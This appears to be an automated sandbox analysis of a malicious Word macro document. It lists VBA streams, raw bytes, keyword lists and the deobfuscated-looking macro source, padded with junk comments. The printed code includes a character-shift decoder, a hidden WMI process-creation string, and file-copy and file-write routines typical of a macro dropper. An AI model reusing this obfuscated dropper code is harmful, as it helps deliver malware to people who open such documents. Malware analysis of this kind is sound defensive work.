                                                                                                                                                                                            aYzBn
                                                                                                                                                                                            roundabout
                                                                                                                                                                                            aVzRp()
                                                                                                                                                                                            (akSqK(aucpr))
                                                                                                                                                                                            Pronoun
                                                                                                                                                                                            aCqnt
                                                                                                                                                                                            positions
                                                                                                                                                                                            teams
                                                                                                                                                                                            purveyor
                                                                                                                                                                                            arthur
                                                                                                                                                                                            louis
                                                                                                                                                                                            soviet
                                                                                                                                                                                            Tatiana
                                                                                                                                                                                            axSiN
                                                                                                                                                                                            motherboard
                                                                                                                                                                                            numeric
                                                                                                                                                                                            Idiom
                                                                                                                                                                                            perspective
                                                                                                                                                                                            dialectic
                                                                                                                                                                                            shallows
                                                                                                                                                                                            gazette
                                                                                                                                                                                            Discovery
                                                                                                                                                                                            felony
                                                                                                                                                                                            unconvinced
                                                                                                                                                                                            roller
                                                                                                                                                                                            Proven
                                                                                                                                                                                            medicare
                                                                                                                                                                                            ElseIf
                                                                                                                                                                                            clime
                                                                                                                                                                                            cartwright
                                                                                                                                                                                            importunate
                                                                                                                                                                                            moiety
                                                                                                                                                                                            guess
                                                                                                                                                                                            Bulldog
                                                                                                                                                                                            adeKx
                                                                                                                                                                                            Bereavement
                                                                                                                                                                                            asses
                                                                                                                                                                                            participated
                                                                                                                                                                                            Waylaid
                                                                                                                                                                                            confiscate
                                                                                                                                                                                            grandchildren
                                                                                                                                                                                            Barely
                                                                                                                                                                                            axSiN()
                                                                                                                                                                                            Shutter
                                                                                                                                                                                            Coiled
                                                                                                                                                                                            realty
                                                                                                                                                                                            compute
                                                                                                                                                                                            Precedence
                                                                                                                                                                                            vapid
                                                                                                                                                                                            Attribute
                                                                                                                                                                                            handcuffs
                                                                                                                                                                                            aaqRT
                                                                                                                                                                                            transparency
                                                                                                                                                                                            specialized
                                                                                                                                                                                            propaganda
                                                                                                                                                                                            VB_Name
                                                                                                                                                                                            calvin
                                                                                                                                                                                            telephony
                                                                                                                                                                                            everyday
                                                                                                                                                                                            Function
                                                                                                                                                                                            baste
                                                                                                                                                                                            demesne
                                                                                                                                                                                            switching
                                                                                                                                                                                            Springer
                                                                                                                                                                                            Modes
                                                                                                                                                                                            Luggage
                                                                                                                                                                                            Avant
                                                                                                                                                                                            catalog
                                                                                                                                                                                            Milky
                                                                                                                                                                                            hearthstone
                                                                                                                                                                                            tracy
                                                                                                                                                                                            expand
                                                                                                                                                                                            aMslO
                                                                                                                                                                                            Johns
                                                                                                                                                                                            sunset
                                                                                                                                                                                            requires
                                                                                                                                                                                            VBA Code
                                                                                                                                                                                            Attribute VB_Name = "aIsb7"
                                                                                                                                                                                            Function aCqnt(ayM1o)
                                                                                                                                                                                            ' Precedence sur soviet wall foal importunate vapid
                                                                                                                                                                                            ' Springer telephony specialized moiety catalog
                                                                                                                                                                                            ' Blackmail
                                                                                                                                                                                            aCqnt = akSqK(ayM1o)
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Function aMslO(aucpr)
                                                                                                                                                                                            ' Proven luis felony
                                                                                                                                                                                            ' Waylaid compute clime fit
                                                                                                                                                                                            ' None numeric expand
                                                                                                                                                                                            ' Barely asses teams lil
                                                                                                                                                                                            aMslO = (akSqK(aucpr))
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Function ayUxA2(aT2PX)
                                                                                                                                                                                            ' Bird
                                                                                                                                                                                            ' Bereavement participated positions
                                                                                                                                                                                            ' Veal shallows cartwright louis confiscate sunset
                                                                                                                                                                                            ' Berkeley able transparency perspective requires hearthstone
                                                                                                                                                                                            ayUxA2 = (akSqK(aT2PX))
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Function axSiN()
                                                                                                                                                                                            adeKx = aMslO(adkJvD(1))
                                                                                                                                                                                            aaqRT = ayUxA2(adkJvD(2))
                                                                                                                                                                                            axSiN = adeKx & " " & aaqRT
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Sub aVzRp()
                                                                                                                                                                                            acIr6u = aCqnt(adkJvD(0))
                                                                                                                                                                                            adeKx = aMslO(adkJvD(1))
                                                                                                                                                                                            amZcqK acIr6u, adeKx
                                                                                                                                                                                            End Sub
                                                                                                                                                                                            Function a3ox6(a48o6)
                                                                                                                                                                                            a3ox6 = a48o6 + -158 + 184
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Function a3eJx(aFP9Ao)
                                                                                                                                                                                            If aFP9Ao = 0 Then
                                                                                                                                                                                            a3eJx = -6824 + 6825
                                                                                                                                                                                            ' Pronoun
                                                                                                                                                                                            ' Veal guess roundabout
                                                                                                                                                                                            ' Discovery
                                                                                                                                                                                            ' Modes arthur
                                                                                                                                                                                            ' Bulldog tracy
                                                                                                                                                                                            ' Johns gulp rice
                                                                                                                                                                                            ' Sync motherboard nuts lens propaganda realty
                                                                                                                                                                                            ' Idiom unconvinced handcuffs tcp
                                                                                                                                                                                            ' Shutter roller valuation sen
                                                                                                                                                                                            ' Coop medicare cons grandchildren
                                                                                                                                                                                            ' Tatiana kite everyday dialectic switching calvin baste
                                                                                                                                                                                            ' Milky plume demesne
                                                                                                                                                                                            ' Coiled purveyor translations gazette plenipotentiary
                                                                                                                                                                                            ' Luggage developer baby
                                                                                                                                                                                            ' Avant
                                                                                                                                                                                            ElseIf aFP9Ao = 5 Then
                                                                                                                                                                                            a3eJx = -63 + 160
                                                                                                                                                                                            Else
                                                                                                                                                                                            a3eJx = 1049 - 25
                                                                                                                                                                                            End If
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Function aYzBn(a48o6, a20NB)
                                                                                                                                                                                            aYzBn = a48o6 - a20NB
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Function a9vceZ(a48o6)
                                                                                                                                                                                            a9vceZ = Chr(a48o6)
                                                                                                                                                                                            End Function
                                                                                                                                                                                            VBA File Name: aOMv0.bas, Stream Size: 3156
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/aOMv0
                                                                                                                                                                                            VBA File Name:aOMv0.bas
                                                                                                                                                                                            Stream Size:3156
                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 k > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:01 16 03 00 00 f0 00 00 00 e2 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff e9 02 00 00 11 09 00 00 00 00 00 00 01 00 00 00 0e 35 6b 3e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                                            VBA Code Keywords

                                                                                                                                                                                            Keyword
                                                                                                                                                                                            causes
                                                                                                                                                                                            anFJy
                                                                                                                                                                                            exclusively
                                                                                                                                                                                            Truly
                                                                                                                                                                                            Browser
                                                                                                                                                                                            aYzBn(aDKIk,
                                                                                                                                                                                            smell
                                                                                                                                                                                            Searched
                                                                                                                                                                                            adBRr(anFJy)
                                                                                                                                                                                            Surrounding
                                                                                                                                                                                            recommendations
                                                                                                                                                                                            nazarene
                                                                                                                                                                                            Constitutes
                                                                                                                                                                                            proteins
                                                                                                                                                                                            delegation
                                                                                                                                                                                            String
                                                                                                                                                                                            aMnjk
                                                                                                                                                                                            commentator
                                                                                                                                                                                            zoological
                                                                                                                                                                                            trunk
                                                                                                                                                                                            Juvenile
                                                                                                                                                                                            pearly
                                                                                                                                                                                            ElseIf
                                                                                                                                                                                            Insider
                                                                                                                                                                                            learning
                                                                                                                                                                                            Oreilly
                                                                                                                                                                                            Asc(aMnjk)
                                                                                                                                                                                            Treasurer
                                                                                                                                                                                            alfred
                                                                                                                                                                                            aDKIk
                                                                                                                                                                                            Integer
                                                                                                                                                                                            limousine
                                                                                                                                                                                            Alexander
                                                                                                                                                                                            Respiratory
                                                                                                                                                                                            aJjwu)
                                                                                                                                                                                            abomination
                                                                                                                                                                                            delayed
                                                                                                                                                                                            Memoirs
                                                                                                                                                                                            Attribute
                                                                                                                                                                                            ascendancy
                                                                                                                                                                                            acclaim
                                                                                                                                                                                            Imprecation
                                                                                                                                                                                            VB_Name
                                                                                                                                                                                            wampum
                                                                                                                                                                                            Etymology
                                                                                                                                                                                            undeceive
                                                                                                                                                                                            Function
                                                                                                                                                                                            priory
                                                                                                                                                                                            humanities
                                                                                                                                                                                            relatives
                                                                                                                                                                                            sufficiency
                                                                                                                                                                                            aJjwu
                                                                                                                                                                                            unless
                                                                                                                                                                                            persons
                                                                                                                                                                                            (aDKIk
                                                                                                                                                                                            elusive
                                                                                                                                                                                            Stumped
                                                                                                                                                                                            turnpike
                                                                                                                                                                                            VBA Code
                                                                                                                                                                                            Attribute VB_Name = "aOMv0"
                                                                                                                                                                                            Function a6sXJE(a2cCM) As String
                                                                                                                                                                                            Dim as6h1W As Long
                                                                                                                                                                                            Dim aDKIk As Integer
                                                                                                                                                                                            Dim aJjwu As Integer
                                                                                                                                                                                            For as6h1W = 1 To VBA.Len(a2cCM) Step 1
                                                                                                                                                                                            ' Stumped deck
                                                                                                                                                                                            ' Juvenile abomination proteins
                                                                                                                                                                                            ' Browser land ascendancy
                                                                                                                                                                                            ' Truly
                                                                                                                                                                                            aJjwu = 0
                                                                                                                                                                                            ' Tier alfred wampum delayed
                                                                                                                                                                                            ' Searched zoological recommendations
                                                                                                                                                                                            ' Gi
                                                                                                                                                                                            aMnjk = Mid(a2cCM, as6h1W, 1)
                                                                                                                                                                                            aDKIk = Asc(aMnjk)
                                                                                                                                                                                            ' Memoirs relatives unless persons
                                                                                                                                                                                            ' Oreilly turnpike
                                                                                                                                                                                            ' Constitutes acclaim aura causes nor learning
                                                                                                                                                                                            ' Alexander undeceive limousine tiny exclusively delegation
                                                                                                                                                                                            If (aDKIk > 64 And aDKIk < 91) Or (aDKIk > 96 And aDKIk < 123) Then
                                                                                                                                                                                            aJjwu = as8nLc
                                                                                                                                                                                            aDKIk = aYzBn(aDKIk, aJjwu)
                                                                                                                                                                                            ' Respiratory sufficiency
                                                                                                                                                                                            ' Imprecation priory pearly trunk
                                                                                                                                                                                            ' Insider
                                                                                                                                                                                            ' Egg
                                                                                                                                                                                            If aDKIk < a3eJx(5) And aDKIk > 83 Then
                                                                                                                                                                                            aDKIk = a3ox6(aDKIk)
                                                                                                                                                                                            ElseIf aDKIk < 128 - 63 Then
                                                                                                                                                                                            aDKIk = a3ox6(aDKIk)
                                                                                                                                                                                            End If
                                                                                                                                                                                            End If
                                                                                                                                                                                            anFJy = a9vceZ(aDKIk)
                                                                                                                                                                                            Mid$(a2cCM, as6h1W, 1) = adBRr(anFJy)
                                                                                                                                                                                            Next
                                                                                                                                                                                            ' Surrounding fl humanities
                                                                                                                                                                                            ' Num
                                                                                                                                                                                            ' Etymology elusive md smell nazarene
                                                                                                                                                                                            ' Treasurer commentator
                                                                                                                                                                                            a6sXJE = a2cCM
                                                                                                                                                                                            End Function
                                                                                                                                                                                            VBA File Name: aRZcbw.bas, Stream Size: 4810
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/aRZcbw
                                                                                                                                                                                            VBA File Name:aRZcbw.bas
                                                                                                                                                                                            Stream Size:4810
                                                                                                                                                                                            Data ASCII:. . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . 5 . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:01 16 03 00 00 f0 00 00 00 62 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 69 04 00 00 b1 0d 00 00 00 00 00 00 01 00 00 00 0e 35 b6 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                                            VBA Code Keywords

                                                                                                                                                                                            Keyword
                                                                                                                                                                                            uninterested
                                                                                                                                                                                            determinate
                                                                                                                                                                                            Const
                                                                                                                                                                                            serenade
                                                                                                                                                                                            fraser
                                                                                                                                                                                            unreliable
                                                                                                                                                                                            Public
                                                                                                                                                                                            Contacting
                                                                                                                                                                                            adolescence
                                                                                                                                                                                            Kinswoman
                                                                                                                                                                                            wickedly
                                                                                                                                                                                            walnut
                                                                                                                                                                                            blots
                                                                                                                                                                                            undivided
                                                                                                                                                                                            vociferous
                                                                                                                                                                                            Antigua
                                                                                                                                                                                            Librarian
                                                                                                                                                                                            Indolence
                                                                                                                                                                                            procedures
                                                                                                                                                                                            encounter
                                                                                                                                                                                            Campaign
                                                                                                                                                                                            riven
                                                                                                                                                                                            Defined
                                                                                                                                                                                            belfast
                                                                                                                                                                                            tradespeople
                                                                                                                                                                                            dizziness
                                                                                                                                                                                            Abstention
                                                                                                                                                                                            Terrorist
                                                                                                                                                                                            Maidenhead
                                                                                                                                                                                            Anniversary
                                                                                                                                                                                            phosphoric
                                                                                                                                                                                            dialectic
                                                                                                                                                                                            enemies
                                                                                                                                                                                            Dentists
                                                                                                                                                                                            String
                                                                                                                                                                                            Upskirt
                                                                                                                                                                                            Nearly
                                                                                                                                                                                            undecided
                                                                                                                                                                                            affordable
                                                                                                                                                                                            timeline
                                                                                                                                                                                            Obviously
                                                                                                                                                                                            selective
                                                                                                                                                                                            offset
                                                                                                                                                                                            const
                                                                                                                                                                                            restrictions
                                                                                                                                                                                            would
                                                                                                                                                                                            shove
                                                                                                                                                                                            nomenclature
                                                                                                                                                                                            axIuO()
                                                                                                                                                                                            Gentle
                                                                                                                                                                                            Choosing
                                                                                                                                                                                            Maine
                                                                                                                                                                                            gamma
                                                                                                                                                                                            consulting
                                                                                                                                                                                            strumpet
                                                                                                                                                                                            schooling
                                                                                                                                                                                            Metallic
                                                                                                                                                                                            dietary
                                                                                                                                                                                            stumble
                                                                                                                                                                                            landscape
                                                                                                                                                                                            Straightforward
                                                                                                                                                                                            prove
                                                                                                                                                                                            deuteronomy
                                                                                                                                                                                            ravage
                                                                                                                                                                                            Ecological
                                                                                                                                                                                            brazilian
                                                                                                                                                                                            Integer
                                                                                                                                                                                            jerky
                                                                                                                                                                                            adroitly
                                                                                                                                                                                            walter
                                                                                                                                                                                            daughter-in-law
                                                                                                                                                                                            aVzRp
                                                                                                                                                                                            shell
                                                                                                                                                                                            supporters
                                                                                                                                                                                            catering
                                                                                                                                                                                            magnanimous
                                                                                                                                                                                            Stylish
                                                                                                                                                                                            haven
                                                                                                                                                                                            assets
                                                                                                                                                                                            boarding
                                                                                                                                                                                            holland
                                                                                                                                                                                            washington
                                                                                                                                                                                            "aRZcbw"
                                                                                                                                                                                            Attribute
                                                                                                                                                                                            abortion
                                                                                                                                                                                            economies
                                                                                                                                                                                            compensation
                                                                                                                                                                                            Receptor
                                                                                                                                                                                            latch
                                                                                                                                                                                            Dysentery
                                                                                                                                                                                            Variety
                                                                                                                                                                                            expanding
                                                                                                                                                                                            VB_Name
                                                                                                                                                                                            Esquire
                                                                                                                                                                                            Fisting
                                                                                                                                                                                            aYKyQ()
                                                                                                                                                                                            collapse
                                                                                                                                                                                            Function
                                                                                                                                                                                            completeness
                                                                                                                                                                                            cambodia
                                                                                                                                                                                            branch
                                                                                                                                                                                            elliptical
                                                                                                                                                                                            Entrust
                                                                                                                                                                                            reporting
                                                                                                                                                                                            demanding
                                                                                                                                                                                            consolidation
                                                                                                                                                                                            sceptic
                                                                                                                                                                                            priced
                                                                                                                                                                                            Gamma
                                                                                                                                                                                            Sensuality
                                                                                                                                                                                            unload
                                                                                                                                                                                            cover
                                                                                                                                                                                            brooded
                                                                                                                                                                                            strings
                                                                                                                                                                                            VBA Code
                                                                                                                                                                                            Attribute VB_Name = "aRZcbw"
                                                                                                                                                                                            Public Const a3IdJQ As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
                                                                                                                                                                                            Public Const a7odJ As String = ")"
                                                                                                                                                                                            Public Const as8nLc As Integer = 30602 / 2354
                                                                                                                                                                                            Function aG87E()
                                                                                                                                                                                            ' Swum fraser washington
                                                                                                                                                                                            ' Choosing vociferous
                                                                                                                                                                                            ' Fisting jack
                                                                                                                                                                                            ' Straightforward holland
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Sub a7zcHr(aFtIw)
                                                                                                                                                                                            ' Terrorist
                                                                                                                                                                                            ' Kinswoman cambodia
                                                                                                                                                                                            ' Abstention dell
                                                                                                                                                                                            ' Maine determinate reporting strings magnanimous
                                                                                                                                                                                            ' Doo catering serenade completeness cover
                                                                                                                                                                                            ' Sensuality restrictions wickedly gamma
                                                                                                                                                                                            ' Esquire unload
                                                                                                                                                                                            ' Seal procedures daughter-in-law rain
                                                                                                                                                                                            ' Ecological bier
                                                                                                                                                                                            ' Receptor adroitly prove shell stumble dialectic latch sceptic
                                                                                                                                                                                            ' Metallic brazilian expanding adolescence
                                                                                                                                                                                            ' Obviously enemies jerky abortion
                                                                                                                                                                                            ' Stylish demanding dietary
                                                                                                                                                                                            ' Nearly deuteronomy
                                                                                                                                                                                            ' Dory undecided walter uninterested landscape
                                                                                                                                                                                            ' Gamma priced dizziness elliptical phosphoric branch
                                                                                                                                                                                            ' Dentists consulting haven pies
                                                                                                                                                                                            ' Lose supporters tradespeople blots
                                                                                                                                                                                            ' Contacting
                                                                                                                                                                                            ' Indolence strumpet shove
                                                                                                                                                                                            End Sub
                                                                                                                                                                                            Function a8qpd(afAV8)
                                                                                                                                                                                            ' Gentle offset brooded boarding ravage assets
                                                                                                                                                                                            ' Upskirt
                                                                                                                                                                                            ' Entrust
                                                                                                                                                                                            ' Campaign walnut timeline compensation view
                                                                                                                                                                                            ' Maidenhead
                                                                                                                                                                                            ' Variety riven undivided
                                                                                                                                                                                            ' Anniversary fete
                                                                                                                                                                                            ' Antigua collapse consolidation economies schooling
                                                                                                                                                                                            a8qpd = ActiveDocument.BuiltInDocumentProperties(afAV8)
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Public Sub aYKyQ()
                                                                                                                                                                                            ' Dysentery const selective open affordable encounter
                                                                                                                                                                                            ' Defined would nomenclature unreliable
                                                                                                                                                                                            ' Librarian belfast
                                                                                                                                                                                            If -342 + 406 < 164 Then
                                                                                                                                                                                            Call aVzRp
                                                                                                                                                                                            End If
                                                                                                                                                                                            End Sub
                                                                                                                                                                                            Public Sub axIuO()
                                                                                                                                                                                            If -342 + 406 < 164 Then
                                                                                                                                                                                            Call ah28l
                                                                                                                                                                                            End If
                                                                                                                                                                                            End Sub
                                                                                                                                                                                            VBA File Name: abh0Rg.bas, Stream Size: 4574
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/abh0Rg
                                                                                                                                                                                            VBA File Name:abh0Rg.bas
                                                                                                                                                                                            Stream Size:4574
                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:01 16 03 00 00 f0 00 00 00 ca 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff d1 03 00 00 e1 0c 00 00 00 00 00 00 01 00 00 00 0e 35 f9 c7 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                                            VBA Code Keywords

                                                                                                                                                                                            Keyword
                                                                                                                                                                                            seasonal
                                                                                                                                                                                            pointed
                                                                                                                                                                                            Trains
                                                                                                                                                                                            Cancelled
                                                                                                                                                                                            theaters
                                                                                                                                                                                            swain
                                                                                                                                                                                            fullness
                                                                                                                                                                                            Public
                                                                                                                                                                                            sulky
                                                                                                                                                                                            referring
                                                                                                                                                                                            explain
                                                                                                                                                                                            compost
                                                                                                                                                                                            Aquarium
                                                                                                                                                                                            bullet
                                                                                                                                                                                            digit
                                                                                                                                                                                            downpour
                                                                                                                                                                                            Changelog
                                                                                                                                                                                            alabaster
                                                                                                                                                                                            denounce
                                                                                                                                                                                            Candy
                                                                                                                                                                                            self-evident
                                                                                                                                                                                            Homesickness
                                                                                                                                                                                            Machinist
                                                                                                                                                                                            statistical
                                                                                                                                                                                            Primacy
                                                                                                                                                                                            FreeFile
                                                                                                                                                                                            Love-making
                                                                                                                                                                                            Truism
                                                                                                                                                                                            companies
                                                                                                                                                                                            mother-in-law
                                                                                                                                                                                            Competition
                                                                                                                                                                                            subway
                                                                                                                                                                                            analytical
                                                                                                                                                                                            walrus
                                                                                                                                                                                            greenhouse
                                                                                                                                                                                            Flaccid
                                                                                                                                                                                            Webshots
                                                                                                                                                                                            Tress
                                                                                                                                                                                            tricolor
                                                                                                                                                                                            pacific
                                                                                                                                                                                            pretension
                                                                                                                                                                                            radius
                                                                                                                                                                                            Print
                                                                                                                                                                                            Drawn
                                                                                                                                                                                            FileNumber
                                                                                                                                                                                            Breakdown
                                                                                                                                                                                            diffidence
                                                                                                                                                                                            Biology
                                                                                                                                                                                            aicyF
                                                                                                                                                                                            illusory
                                                                                                                                                                                            wikipedia
                                                                                                                                                                                            poison
                                                                                                                                                                                            adBRr
                                                                                                                                                                                            dutch
                                                                                                                                                                                            suggesting
                                                                                                                                                                                            participation
                                                                                                                                                                                            Plaza
                                                                                                                                                                                            Sanity
                                                                                                                                                                                            Gaoler
                                                                                                                                                                                            impromptu
                                                                                                                                                                                            isthmus
                                                                                                                                                                                            Amber
                                                                                                                                                                                            sender
                                                                                                                                                                                            urges
                                                                                                                                                                                            changes
                                                                                                                                                                                            #FileNumber
                                                                                                                                                                                            confidentiality
                                                                                                                                                                                            tunisia
                                                                                                                                                                                            liqueur
                                                                                                                                                                                            Simulated
                                                                                                                                                                                            coding
                                                                                                                                                                                            venues
                                                                                                                                                                                            seashore
                                                                                                                                                                                            reservation
                                                                                                                                                                                            lighthouse
                                                                                                                                                                                            swimmer
                                                                                                                                                                                            Arising
                                                                                                                                                                                            aicyF)
                                                                                                                                                                                            lambent
                                                                                                                                                                                            sloped
                                                                                                                                                                                            shortening
                                                                                                                                                                                            fahrenheit
                                                                                                                                                                                            transcendent
                                                                                                                                                                                            #FileNumber,
                                                                                                                                                                                            flexible
                                                                                                                                                                                            Winsome
                                                                                                                                                                                            Georgia
                                                                                                                                                                                            option
                                                                                                                                                                                            Forests
                                                                                                                                                                                            lazarus
                                                                                                                                                                                            labourer
                                                                                                                                                                                            bukkake
                                                                                                                                                                                            Grenada
                                                                                                                                                                                            Surplus
                                                                                                                                                                                            Attribute
                                                                                                                                                                                            avhZYf
                                                                                                                                                                                            aVOhvn
                                                                                                                                                                                            Syntax
                                                                                                                                                                                            Close
                                                                                                                                                                                            devious
                                                                                                                                                                                            engineers
                                                                                                                                                                                            cleaner
                                                                                                                                                                                            VB_Name
                                                                                                                                                                                            lichen
                                                                                                                                                                                            Outwards
                                                                                                                                                                                            stubbornly
                                                                                                                                                                                            proceeds
                                                                                                                                                                                            trusted
                                                                                                                                                                                            Function
                                                                                                                                                                                            belle
                                                                                                                                                                                            depth
                                                                                                                                                                                            highlighted
                                                                                                                                                                                            FileCopy
                                                                                                                                                                                            louisville
                                                                                                                                                                                            Inconsistency
                                                                                                                                                                                            ungracious
                                                                                                                                                                                            opposite
                                                                                                                                                                                            adBRr(avhZYf)
                                                                                                                                                                                            disagree
                                                                                                                                                                                            Indisputable
                                                                                                                                                                                            Output
                                                                                                                                                                                            classroom
                                                                                                                                                                                            notch
                                                                                                                                                                                            Abandons
                                                                                                                                                                                            allegorical
                                                                                                                                                                                            Overhung
                                                                                                                                                                                            eddies
                                                                                                                                                                                            Adultery
                                                                                                                                                                                            Intact
                                                                                                                                                                                            VBA Code
                                                                                                                                                                                            Attribute VB_Name = "abh0Rg"
                                                                                                                                                                                            Public Function aX4od(aVOhvn, aA5aKj)
                                                                                                                                                                                            ' Primacy
                                                                                                                                                                                            ' Love-making walrus argo referring lighthouse pretension
                                                                                                                                                                                            ' Tress una explain subway louisville
                                                                                                                                                                                            ' Aquarium allegorical
                                                                                                                                                                                            ' Inconsistency option
                                                                                                                                                                                            ' Georgia flexible theaters
                                                                                                                                                                                            ' Gaoler stubbornly labourer rolf
                                                                                                                                                                                            ' Machinist tang lichen illusory
                                                                                                                                                                                            ' Competition eddies muff cant
                                                                                                                                                                                            ' Overhung
                                                                                                                                                                                            ' Forests poison ex
                                                                                                                                                                                            ' Indisputable liqueur
                                                                                                                                                                                            ' Grenada
                                                                                                                                                                                            ' Cancelled participation self-evident wikipedia highlighted opposite notch
                                                                                                                                                                                            ' Sanity suggesting transcendent
                                                                                                                                                                                            ' Webshots tricolor ungracious
                                                                                                                                                                                            ' Changelog tunisia classroom diffidence
                                                                                                                                                                                            ' Candy pointed companies
                                                                                                                                                                                            ' Chen engineers
                                                                                                                                                                                            ' Outwards coding joe
                                                                                                                                                                                            ' Truism fahrenheit downpour isthmus
                                                                                                                                                                                            ' Intact digit cleaner fullness lambent
                                                                                                                                                                                            ' Breakdown fear
                                                                                                                                                                                            FileNumber = FreeFile
                                                                                                                                                                                            Open aVOhvn For Output As #FileNumber
                                                                                                                                                                                            ' Eng urges bukkake
                                                                                                                                                                                            ' Plaza confidentiality bunk
                                                                                                                                                                                            ' Abandons swimmer alabaster
                                                                                                                                                                                            ' Take swain reservation impromptu seasonal proceeds
                                                                                                                                                                                            Print #FileNumber, aA5aKj
                                                                                                                                                                                            ' Biology bus disagree statistical depth compost
                                                                                                                                                                                            ' Surplus greenhouse denounce
                                                                                                                                                                                            ' Syntax
                                                                                                                                                                                            ' Homesickness devious
                                                                                                                                                                                            Close #FileNumber
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Sub amZcqK(aH6Oa, aicyF)
                                                                                                                                                                                            ' Simulated pacific belle changes
                                                                                                                                                                                            ' Winsome radius dutch
                                                                                                                                                                                            ' Adultery soft mother-in-law trusted
                                                                                                                                                                                            ' Sod lazarus gg analytical
                                                                                                                                                                                            ' Amber
                                                                                                                                                                                            ' Deep
                                                                                                                                                                                            ' Drawn shortening
                                                                                                                                                                                            ' Trains seashore venues sock sender prev
                                                                                                                                                                                            ' Arising
                                                                                                                                                                                            ' Flaccid sloped bullet sulky
                                                                                                                                                                                            FileCopy aH6Oa, aicyF
                                                                                                                                                                                            End Sub
                                                                                                                                                                                            Function adBRr(avhZYf)
                                                                                                                                                                                            adBRr = avhZYf
                                                                                                                                                                                            End Function
                                                                                                                                                                                            VBA File Name: adGbPA.bas, Stream Size: 4586
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/adGbPA
                                                                                                                                                                                            VBA File Name:adGbPA.bas
                                                                                                                                                                                            Stream Size:4586
                                                                                                                                                                                            Data ASCII:. . . . . . . . . J . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . 5 . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:01 16 03 00 00 f0 00 00 00 4a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 51 03 00 00 f5 0c 00 00 00 00 00 00 01 00 00 00 0e 35 ee 60 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                                            VBA Code Keywords

                                                                                                                                                                                            Keyword
                                                                                                                                                                                            intervals
                                                                                                                                                                                            octagonal
                                                                                                                                                                                            neigh
                                                                                                                                                                                            signs
                                                                                                                                                                                            astrology
                                                                                                                                                                                            legitimately
                                                                                                                                                                                            tittle
                                                                                                                                                                                            southwest
                                                                                                                                                                                            Technique
